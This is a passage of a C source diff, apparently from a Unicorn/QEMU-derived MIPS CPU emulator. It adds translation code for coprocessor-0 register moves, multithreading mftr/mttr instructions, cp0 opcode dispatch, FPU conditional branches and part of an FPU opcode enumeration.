*/ + gen_save_pc(ctx, ctx->pc + 4); + ctx->bstate = BS_EXCP; + rn = "Debug"; + break; + case 1: +// gen_helper_mtc0_tracecontrol(tcg_ctx->cpu_env, arg); /* PDtrace support */ + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "TraceControl"; +// break; + case 2: +// gen_helper_mtc0_tracecontrol2(tcg_ctx->cpu_env, arg); /* PDtrace support */ + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "TraceControl2"; +// break; + case 3: +// gen_helper_mtc0_usertracedata(tcg_ctx->cpu_env, arg); /* PDtrace support */ + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "UserTraceData"; +// break; + case 4: +// gen_helper_mtc0_tracebpc(tcg_ctx->cpu_env, arg); /* PDtrace support */ + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "TraceBPC"; +// break; + default: + goto cp0_unimplemented; + } + break; + case 24: + switch (sel) { + case 0: + /* EJTAG support */ + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_DEPC)); + rn = "DEPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 25: + switch (sel) { + case 0: + gen_helper_mtc0_performance0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Performance0"; + break; + case 1: +// gen_helper_mtc0_performance1(tcg_ctx->cpu_env, arg); + rn = "Performance1"; +// break; + case 2: +// gen_helper_mtc0_performance2(tcg_ctx->cpu_env, arg); + rn = "Performance2"; +// break; + case 3: +// gen_helper_mtc0_performance3(tcg_ctx->cpu_env, arg); + rn = "Performance3"; +// break; + case 4: +// gen_helper_mtc0_performance4(tcg_ctx->cpu_env, arg); + rn = "Performance4"; +// break; + case 5: +// gen_helper_mtc0_performance5(tcg_ctx->cpu_env, arg); + rn = "Performance5"; +// break; + case 6: +// gen_helper_mtc0_performance6(tcg_ctx->cpu_env, arg); + rn = "Performance6"; +// break; + case 7: +// 
gen_helper_mtc0_performance7(tcg_ctx->cpu_env, arg); + rn = "Performance7"; +// break; + default: + goto cp0_unimplemented; + } + break; + case 26: + /* ignored */ + rn = "ECC"; + break; + case 27: + switch (sel) { + case 0: case 1: case 2: case 3: + /* ignored */ + rn = "CacheErr"; + break; + default: + goto cp0_unimplemented; + } + break; + case 28: + switch (sel) { + case 0: + case 2: + case 4: + case 6: + gen_helper_mtc0_taglo(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TagLo"; + break; + case 1: + case 3: + case 5: + case 7: + gen_helper_mtc0_datalo(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "DataLo"; + break; + default: + goto cp0_unimplemented; + } + break; + case 29: + switch (sel) { + case 0: + case 2: + case 4: + case 6: + gen_helper_mtc0_taghi(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TagHi"; + break; + case 1: + case 3: + case 5: + case 7: + gen_helper_mtc0_datahi(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "DataHi"; + break; + default: + rn = "invalid sel"; + goto cp0_unimplemented; + } + break; + case 30: + switch (sel) { + case 0: + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_ErrorEPC)); + rn = "ErrorEPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 31: + switch (sel) { + case 0: + /* EJTAG support */ + gen_mtc0_store32(ctx, arg, offsetof(CPUMIPSState, CP0_DESAVE)); + rn = "DESAVE"; + break; + case 2: case 3: case 4: case 5: case 6: case 7: + CP0_CHECK(ctx->kscrexist & (1 << sel)); + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, CP0_KScratch[sel-2])); + rn = "KScratch"; + break; + default: + goto cp0_unimplemented; + } + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + default: + goto cp0_unimplemented; + } + (void)rn; /* avoid a compiler warning */ + LOG_DISAS("dmtc0 %s (reg %d sel %d)\n", rn, reg, sel); + /* For simplicity assume that all writes can cause interrupts. 
*/ + //if (use_icount) { + // gen_io_end(); + // ctx->bstate = BS_STOP; + //} + return; + +cp0_unimplemented: + LOG_DISAS("dmtc0 %s (reg %d sel %d)\n", rn, reg, sel); +} +#endif /* TARGET_MIPS64 */ + +static void gen_mftr(CPUMIPSState *env, DisasContext *ctx, int rt, int rd, + int u, int sel, int h) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + TCGv t0 = tcg_temp_local_new(tcg_ctx); + + if ((env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP)) == 0 && + ((env->tcs[other_tc].CP0_TCBind & (0xf << CP0TCBd_CurVPE)) != + (env->active_tc.CP0_TCBind & (0xf << CP0TCBd_CurVPE)))) + tcg_gen_movi_tl(tcg_ctx, t0, -1); + else if ((env->CP0_VPEControl & (0xff << CP0VPECo_TargTC)) > + (env->mvp->CP0_MVPConf0 & (0xff << CP0MVPC0_PTC))) + tcg_gen_movi_tl(tcg_ctx, t0, -1); + else if (u == 0) { + switch (rt) { + case 1: + switch (sel) { + case 1: + gen_helper_mftc0_vpecontrol(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + case 2: + gen_helper_mftc0_vpeconf0(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + goto die; + break; + } + break; + case 2: + switch (sel) { + case 1: + gen_helper_mftc0_tcstatus(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + case 2: + gen_helper_mftc0_tcbind(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + case 3: + gen_helper_mftc0_tcrestart(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + case 4: + gen_helper_mftc0_tchalt(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + case 5: + gen_helper_mftc0_tccontext(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + case 6: + gen_helper_mftc0_tcschedule(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + case 7: + gen_helper_mftc0_tcschefback(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + gen_mfc0(ctx, t0, rt, sel); + break; + } + break; + case 10: + switch (sel) { + case 0: + gen_helper_mftc0_entryhi(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + gen_mfc0(ctx, t0, rt, sel); + break; + } + case 12: + switch (sel) { + case 0: + gen_helper_mftc0_status(tcg_ctx, t0, tcg_ctx->cpu_env); + 
break; + default: + gen_mfc0(ctx, t0, rt, sel); + break; + } + case 13: + switch (sel) { + case 0: + gen_helper_mftc0_cause(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + goto die; + break; + } + break; + case 14: + switch (sel) { + case 0: + gen_helper_mftc0_epc(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + goto die; + break; + } + break; + case 15: + switch (sel) { + case 1: + gen_helper_mftc0_ebase(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + goto die; + break; + } + break; + case 16: + switch (sel) { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + gen_helper_mftc0_configx(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_const_tl(tcg_ctx, sel)); + break; + default: + goto die; + break; + } + break; + case 23: + switch (sel) { + case 0: + gen_helper_mftc0_debug(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + gen_mfc0(ctx, t0, rt, sel); + break; + } + break; + default: + gen_mfc0(ctx, t0, rt, sel); + } + } else switch (sel) { + /* GPR registers. */ + case 0: + gen_helper_1e0i(tcg_ctx, mftgpr, t0, rt); + break; + /* Auxiliary CPU registers */ + case 1: + switch (rt) { + case 0: + gen_helper_1e0i(tcg_ctx, mftlo, t0, 0); + break; + case 1: + gen_helper_1e0i(tcg_ctx, mfthi, t0, 0); + break; + case 2: + gen_helper_1e0i(tcg_ctx, mftacx, t0, 0); + break; + case 4: + gen_helper_1e0i(tcg_ctx, mftlo, t0, 1); + break; + case 5: + gen_helper_1e0i(tcg_ctx, mfthi, t0, 1); + break; + case 6: + gen_helper_1e0i(tcg_ctx, mftacx, t0, 1); + break; + case 8: + gen_helper_1e0i(tcg_ctx, mftlo, t0, 2); + break; + case 9: + gen_helper_1e0i(tcg_ctx, mfthi, t0, 2); + break; + case 10: + gen_helper_1e0i(tcg_ctx, mftacx, t0, 2); + break; + case 12: + gen_helper_1e0i(tcg_ctx, mftlo, t0, 3); + break; + case 13: + gen_helper_1e0i(tcg_ctx, mfthi, t0, 3); + break; + case 14: + gen_helper_1e0i(tcg_ctx, mftacx, t0, 3); + break; + case 16: + gen_helper_mftdsp(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + goto die; + } + break; + /* Floating point (COP1). 
*/ + case 2: + /* XXX: For now we support only a single FPU context. */ + if (h == 0) { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, rt); + tcg_gen_ext_i32_tl(tcg_ctx, t0, fp0); + tcg_temp_free_i32(tcg_ctx, fp0); + } else { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32h(ctx, fp0, rt); + tcg_gen_ext_i32_tl(tcg_ctx, t0, fp0); + tcg_temp_free_i32(tcg_ctx, fp0); + } + break; + case 3: + /* XXX: For now we support only a single FPU context. */ + gen_helper_1e0i(tcg_ctx, cfc1, t0, rt); + break; + /* COP2: Not implemented. */ + case 4: + case 5: + /* fall through */ + default: + goto die; + } + LOG_DISAS("mftr (reg %d u %d sel %d h %d)\n", rt, u, sel, h); + gen_store_gpr(tcg_ctx, t0, rd); + tcg_temp_free(tcg_ctx, t0); + return; + +die: + tcg_temp_free(tcg_ctx, t0); + LOG_DISAS("mftr (reg %d u %d sel %d h %d)\n", rt, u, sel, h); + generate_exception(ctx, EXCP_RI); +} + +static void gen_mttr(CPUMIPSState *env, DisasContext *ctx, int rd, int rt, + int u, int sel, int h) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + TCGv t0 = tcg_temp_local_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rt); + if ((env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP)) == 0 && + ((env->tcs[other_tc].CP0_TCBind & (0xf << CP0TCBd_CurVPE)) != + (env->active_tc.CP0_TCBind & (0xf << CP0TCBd_CurVPE)))) + /* NOP */ ; + else if ((env->CP0_VPEControl & (0xff << CP0VPECo_TargTC)) > + (env->mvp->CP0_MVPConf0 & (0xff << CP0MVPC0_PTC))) + /* NOP */ ; + else if (u == 0) { + switch (rd) { + case 1: + switch (sel) { + case 1: + gen_helper_mttc0_vpecontrol(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + case 2: + gen_helper_mttc0_vpeconf0(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + default: + goto die; + break; + } + break; + case 2: + switch (sel) { + case 1: + gen_helper_mttc0_tcstatus(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + case 2: + gen_helper_mttc0_tcbind(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + case 3: + 
gen_helper_mttc0_tcrestart(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + case 4: + gen_helper_mttc0_tchalt(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + case 5: + gen_helper_mttc0_tccontext(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + case 6: + gen_helper_mttc0_tcschedule(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + case 7: + gen_helper_mttc0_tcschefback(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + default: + gen_mtc0(ctx, t0, rd, sel); + break; + } + break; + case 10: + switch (sel) { + case 0: + gen_helper_mttc0_entryhi(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + default: + gen_mtc0(ctx, t0, rd, sel); + break; + } + case 12: + switch (sel) { + case 0: + gen_helper_mttc0_status(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + default: + gen_mtc0(ctx, t0, rd, sel); + break; + } + case 13: + switch (sel) { + case 0: + gen_helper_mttc0_cause(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + default: + goto die; + break; + } + break; + case 15: + switch (sel) { + case 1: + gen_helper_mttc0_ebase(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + default: + goto die; + break; + } + break; + case 23: + switch (sel) { + case 0: + gen_helper_mttc0_debug(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + default: + gen_mtc0(ctx, t0, rd, sel); + break; + } + break; + default: + gen_mtc0(ctx, t0, rd, sel); + } + } else switch (sel) { + /* GPR registers. 
*/ + case 0: + gen_helper_0e1i(tcg_ctx, mttgpr, t0, rd); + break; + /* Auxiliary CPU registers */ + case 1: + switch (rd) { + case 0: + gen_helper_0e1i(tcg_ctx, mttlo, t0, 0); + break; + case 1: + gen_helper_0e1i(tcg_ctx, mtthi, t0, 0); + break; + case 2: + gen_helper_0e1i(tcg_ctx, mttacx, t0, 0); + break; + case 4: + gen_helper_0e1i(tcg_ctx, mttlo, t0, 1); + break; + case 5: + gen_helper_0e1i(tcg_ctx, mtthi, t0, 1); + break; + case 6: + gen_helper_0e1i(tcg_ctx, mttacx, t0, 1); + break; + case 8: + gen_helper_0e1i(tcg_ctx, mttlo, t0, 2); + break; + case 9: + gen_helper_0e1i(tcg_ctx, mtthi, t0, 2); + break; + case 10: + gen_helper_0e1i(tcg_ctx, mttacx, t0, 2); + break; + case 12: + gen_helper_0e1i(tcg_ctx, mttlo, t0, 3); + break; + case 13: + gen_helper_0e1i(tcg_ctx, mtthi, t0, 3); + break; + case 14: + gen_helper_0e1i(tcg_ctx, mttacx, t0, 3); + break; + case 16: + gen_helper_mttdsp(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + default: + goto die; + } + break; + /* Floating point (COP1). */ + case 2: + /* XXX: For now we support only a single FPU context. */ + if (h == 0) { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); + gen_store_fpr32(ctx, fp0, rd); + tcg_temp_free_i32(tcg_ctx, fp0); + } else { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); + gen_store_fpr32h(ctx, fp0, rd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + break; + case 3: + /* XXX: For now we support only a single FPU context. */ + save_cpu_state(ctx, 1); + { + TCGv_i32 fs_tmp = tcg_const_i32(tcg_ctx, rd); + + gen_helper_0e2i(tcg_ctx, ctc1, t0, fs_tmp, rt); + tcg_temp_free_i32(tcg_ctx, fs_tmp); + } + /* Stop translation as we may have changed hflags */ + ctx->bstate = BS_STOP; + break; + /* COP2: Not implemented. 
*/ + case 4: + case 5: + /* fall through */ + default: + goto die; + } + LOG_DISAS("mttr (reg %d u %d sel %d h %d)\n", rd, u, sel, h); + tcg_temp_free(tcg_ctx, t0); + return; + +die: + tcg_temp_free(tcg_ctx, t0); + LOG_DISAS("mttr (reg %d u %d sel %d h %d)\n", rd, u, sel, h); + generate_exception(ctx, EXCP_RI); +} + +static void gen_cp0 (CPUMIPSState *env, DisasContext *ctx, uint32_t opc, int rt, int rd) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "ldst"; + + check_cp0_enabled(ctx); + switch (opc) { + case OPC_MFC0: + if (rt == 0) { + /* Treat as NOP. */ + return; + } + gen_mfc0(ctx, *cpu_gpr[rt], rd, ctx->opcode & 0x7); + opn = "mfc0"; + break; + case OPC_MTC0: + { + TCGv t0 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rt); + gen_mtc0(ctx, t0, rd, ctx->opcode & 0x7); + tcg_temp_free(tcg_ctx, t0); + } + opn = "mtc0"; + break; +#if defined(TARGET_MIPS64) + case OPC_DMFC0: + check_insn(ctx, ISA_MIPS3); + if (rt == 0) { + /* Treat as NOP. */ + return; + } + gen_dmfc0(ctx, *cpu_gpr[rt], rd, ctx->opcode & 0x7); + opn = "dmfc0"; + break; + case OPC_DMTC0: + check_insn(ctx, ISA_MIPS3); + { + TCGv t0 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rt); + gen_dmtc0(ctx, t0, rd, ctx->opcode & 0x7); + tcg_temp_free(tcg_ctx, t0); + } + opn = "dmtc0"; + break; +#endif + case OPC_MFTR: + check_insn(ctx, ASE_MT); + if (rd == 0) { + /* Treat as NOP. 
*/ + return; + } + gen_mftr(env, ctx, rt, rd, (ctx->opcode >> 5) & 1, + ctx->opcode & 0x7, (ctx->opcode >> 4) & 1); + opn = "mftr"; + break; + case OPC_MTTR: + check_insn(ctx, ASE_MT); + gen_mttr(env, ctx, rd, rt, (ctx->opcode >> 5) & 1, + ctx->opcode & 0x7, (ctx->opcode >> 4) & 1); + opn = "mttr"; + break; + case OPC_TLBWI: + opn = "tlbwi"; + if (!env->tlb->helper_tlbwi) + goto die; + gen_helper_tlbwi(tcg_ctx, tcg_ctx->cpu_env); + break; + case OPC_TLBINV: + opn = "tlbinv"; + if (ctx->ie >= 2) { + if (!env->tlb->helper_tlbinv) { + goto die; + } + gen_helper_tlbinv(tcg_ctx, tcg_ctx->cpu_env); + } /* treat as nop if TLBINV not supported */ + break; + case OPC_TLBINVF: + opn = "tlbinvf"; + if (ctx->ie >= 2) { + if (!env->tlb->helper_tlbinvf) { + goto die; + } + gen_helper_tlbinvf(tcg_ctx, tcg_ctx->cpu_env); + } /* treat as nop if TLBINV not supported */ + break; + case OPC_TLBWR: + opn = "tlbwr"; + if (!env->tlb->helper_tlbwr) + goto die; + gen_helper_tlbwr(tcg_ctx, tcg_ctx->cpu_env); + break; + case OPC_TLBP: + opn = "tlbp"; + if (!env->tlb->helper_tlbp) + goto die; + gen_helper_tlbp(tcg_ctx, tcg_ctx->cpu_env); + break; + case OPC_TLBR: + opn = "tlbr"; + if (!env->tlb->helper_tlbr) + goto die; + gen_helper_tlbr(tcg_ctx, tcg_ctx->cpu_env); + break; + case OPC_ERET: + opn = "eret"; + check_insn(ctx, ISA_MIPS2); + if ((ctx->insn_flags & ISA_MIPS32R6) && + (ctx->hflags & MIPS_HFLAG_BMASK)) { + MIPS_DEBUG("CTI in delay / forbidden slot"); + goto die; + } + gen_helper_eret(tcg_ctx, tcg_ctx->cpu_env); + ctx->bstate = BS_EXCP; + break; + case OPC_DERET: + opn = "deret"; + check_insn(ctx, ISA_MIPS32); + if ((ctx->insn_flags & ISA_MIPS32R6) && + (ctx->hflags & MIPS_HFLAG_BMASK)) { + MIPS_DEBUG("CTI in delay / forbidden slot"); + goto die; + } + if (!(ctx->hflags & MIPS_HFLAG_DM)) { + MIPS_INVAL(opn); + generate_exception(ctx, EXCP_RI); + } else { + gen_helper_deret(tcg_ctx, tcg_ctx->cpu_env); + ctx->bstate = BS_EXCP; + } + break; + case OPC_WAIT: + opn = "wait"; + 
check_insn(ctx, ISA_MIPS3 | ISA_MIPS32); + if ((ctx->insn_flags & ISA_MIPS32R6) && + (ctx->hflags & MIPS_HFLAG_BMASK)) { + MIPS_DEBUG("CTI in delay / forbidden slot"); + goto die; + } + /* If we get an exception, we want to restart at next instruction */ + ctx->pc += 4; + save_cpu_state(ctx, 1); + ctx->pc -= 4; + gen_helper_wait(tcg_ctx, tcg_ctx->cpu_env); + ctx->bstate = BS_EXCP; + break; + default: + die: + MIPS_INVAL(opn); + generate_exception(ctx, EXCP_RI); + return; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s %d", opn, regnames[rt], rd); +} +#endif /* !CONFIG_USER_ONLY */ + +/* CP1 Branches (before delay slot) */ +static void gen_compute_branch1(DisasContext *ctx, uint32_t op, + int32_t cc, int32_t offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + target_ulong btarget; + const char *opn = "cp1 cond branch"; + TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); + + if ((ctx->insn_flags & ISA_MIPS32R6) && (ctx->hflags & MIPS_HFLAG_BMASK)) { + MIPS_DEBUG("CTI in delay / forbidden slot"); + generate_exception(ctx, EXCP_RI); + goto out; + } + + if (cc != 0) + check_insn(ctx, ISA_MIPS4 | ISA_MIPS32); + + btarget = ctx->pc + 4 + offset; + + switch (op) { + case OPC_BC1F: + tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); + tcg_gen_not_i32(tcg_ctx, t0, t0); + tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); + tcg_gen_extu_i32_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + opn = "bc1f"; + goto not_likely; + case OPC_BC1FL: + tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); + tcg_gen_not_i32(tcg_ctx, t0, t0); + tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); + tcg_gen_extu_i32_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + opn = "bc1fl"; + goto likely; + case OPC_BC1T: + tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); + tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); + tcg_gen_extu_i32_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + opn = "bc1t"; + goto not_likely; + case OPC_BC1TL: + tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 
get_fp_bit(cc)); + tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); + tcg_gen_extu_i32_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + opn = "bc1tl"; + likely: + ctx->hflags |= MIPS_HFLAG_BL; + break; + case OPC_BC1FANY2: + { + TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); + tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc+1)); + tcg_gen_nand_i32(tcg_ctx, t0, t0, t1); + tcg_temp_free_i32(tcg_ctx, t1); + tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); + tcg_gen_extu_i32_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + } + opn = "bc1any2f"; + goto not_likely; + case OPC_BC1TANY2: + { + TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); + tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc+1)); + tcg_gen_or_i32(tcg_ctx, t0, t0, t1); + tcg_temp_free_i32(tcg_ctx, t1); + tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); + tcg_gen_extu_i32_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + } + opn = "bc1any2t"; + goto not_likely; + case OPC_BC1FANY4: + { + TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); + tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc+1)); + tcg_gen_and_i32(tcg_ctx, t0, t0, t1); + tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc+2)); + tcg_gen_and_i32(tcg_ctx, t0, t0, t1); + tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc+3)); + tcg_gen_nand_i32(tcg_ctx, t0, t0, t1); + tcg_temp_free_i32(tcg_ctx, t1); + tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); + tcg_gen_extu_i32_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + } + opn = "bc1any4f"; + goto not_likely; + case OPC_BC1TANY4: + { + TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shri_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, get_fp_bit(cc)); + tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc+1)); + tcg_gen_or_i32(tcg_ctx, t0, t0, t1); + tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, 
get_fp_bit(cc+2)); + tcg_gen_or_i32(tcg_ctx, t0, t0, t1); + tcg_gen_shri_i32(tcg_ctx, t1, tcg_ctx->fpu_fcr31, get_fp_bit(cc+3)); + tcg_gen_or_i32(tcg_ctx, t0, t0, t1); + tcg_temp_free_i32(tcg_ctx, t1); + tcg_gen_andi_i32(tcg_ctx, t0, t0, 1); + tcg_gen_extu_i32_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + } + opn = "bc1any4t"; + not_likely: + ctx->hflags |= MIPS_HFLAG_BC; + break; + default: + MIPS_INVAL(opn); + generate_exception (ctx, EXCP_RI); + goto out; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s: cond %02x target " TARGET_FMT_lx, opn, + ctx->hflags, btarget); + ctx->btarget = btarget; + ctx->hflags |= MIPS_HFLAG_BDS32; + out: + tcg_temp_free_i32(tcg_ctx, t0); +} + +/* R6 CP1 Branches */ +static void gen_compute_branch1_r6(DisasContext *ctx, uint32_t op, + int32_t ft, int32_t offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + target_ulong btarget; + const char *opn = "cp1 cond branch"; + TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); + + if (ctx->hflags & MIPS_HFLAG_BMASK) { +#ifdef MIPS_DEBUG_DISAS + LOG_DISAS("Branch in delay / forbidden slot at PC 0x" TARGET_FMT_lx + "\n", ctx->pc); +#endif + generate_exception(ctx, EXCP_RI); + goto out; + } + + gen_load_fpr64(ctx, t0, ft); + tcg_gen_andi_i64(tcg_ctx, t0, t0, 1); + + btarget = addr_add(ctx, ctx->pc + 4, offset); + + switch (op) { + case OPC_BC1EQZ: + tcg_gen_xori_i64(tcg_ctx, t0, t0, 1); + opn = "bc1eqz"; + ctx->hflags |= MIPS_HFLAG_BC; + break; + case OPC_BC1NEZ: + /* t0 already set */ + opn = "bc1nez"; + ctx->hflags |= MIPS_HFLAG_BC; + break; + default: + MIPS_INVAL(opn); + generate_exception(ctx, EXCP_RI); + goto out; + } + + tcg_gen_trunc_i64_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s: cond %02x target " TARGET_FMT_lx, opn, + ctx->hflags, btarget); + ctx->btarget = btarget; + ctx->hflags |= MIPS_HFLAG_BDS32; + +out: + tcg_temp_free_i64(tcg_ctx, t0); +} + +/* Coprocessor 1 (FPU) */ + +#define FOP(func, fmt) (((fmt) << 21) | 
(func)) + +enum fopcode { + OPC_ADD_S = FOP(0, FMT_S), + OPC_SUB_S = FOP(1, FMT_S), + OPC_MUL_S = FOP(2, FMT_S), + OPC_DIV_S = FOP(3, FMT_S), + OPC_SQRT_S = FOP(4, FMT_S), + OPC_ABS_S = FOP(5, FMT_S), + OPC_MOV_S = FOP(6, FMT_S), + OPC_NEG_S = FOP(7, FMT_S), + OPC_ROUND_L_S = FOP(8, FMT_S), + OPC_TRUNC_L_S = FOP(9, FMT_S), + OPC_CEIL_L_S = FOP(10, FMT_S), + OPC_FLOOR_L_S = FOP(11, FMT_S), + OPC_ROUND_W_S = FOP(12, FMT_S), + OPC_TRUNC_W_S = FOP(13, FMT_S), + OPC_CEIL_W_S = FOP(14, FMT_S), + OPC_FLOOR_W_S = FOP(15, FMT_S), + OPC_SEL_S = FOP(16, FMT_S), + OPC_MOVCF_S = FOP(17, FMT_S), + OPC_MOVZ_S = FOP(18, FMT_S), + OPC_MOVN_S = FOP(19, FMT_S), + OPC_SELEQZ_S = FOP(20, FMT_S), + OPC_RECIP_S = FOP(21, FMT_S), + OPC_RSQRT_S = FOP(22, FMT_S), + OPC_SELNEZ_S = FOP(23, FMT_S), + OPC_MADDF_S = FOP(24, FMT_S), + OPC_MSUBF_S = FOP(25, FMT_S), + OPC_RINT_S = FOP(26, FMT_S), + OPC_CLASS_S = FOP(27, FMT_S), + OPC_MIN_S = FOP(28, FMT_S), + OPC_RECIP2_S = FOP(28, FMT_S), + OPC_MINA_S = FOP(29, FMT_S), + OPC_RECIP1_S = FOP(29, FMT_S), + OPC_MAX_S = FOP(30, FMT_S), + OPC_RSQRT1_S = FOP(30, FMT_S), + OPC_MAXA_S = FOP(31, FMT_S), + OPC_RSQRT2_S = FOP(31, FMT_S), + OPC_CVT_D_S = FOP(33, FMT_S), + OPC_CVT_W_S = FOP(36, FMT_S), + OPC_CVT_L_S = FOP(37, FMT_S), + OPC_CVT_PS_S = FOP(38, FMT_S), + OPC_CMP_F_S = FOP (48, FMT_S), + OPC_CMP_UN_S = FOP (49, FMT_S), + OPC_CMP_EQ_S = FOP (50, FMT_S), + OPC_CMP_UEQ_S = FOP (51, FMT_S), + OPC_CMP_OLT_S = FOP (52, FMT_S), + OPC_CMP_ULT_S = FOP (53, FMT_S), + OPC_CMP_OLE_S = FOP (54, FMT_S), + OPC_CMP_ULE_S = FOP (55, FMT_S), + OPC_CMP_SF_S = FOP (56, FMT_S), + OPC_CMP_NGLE_S = FOP (57, FMT_S), + OPC_CMP_SEQ_S = FOP (58, 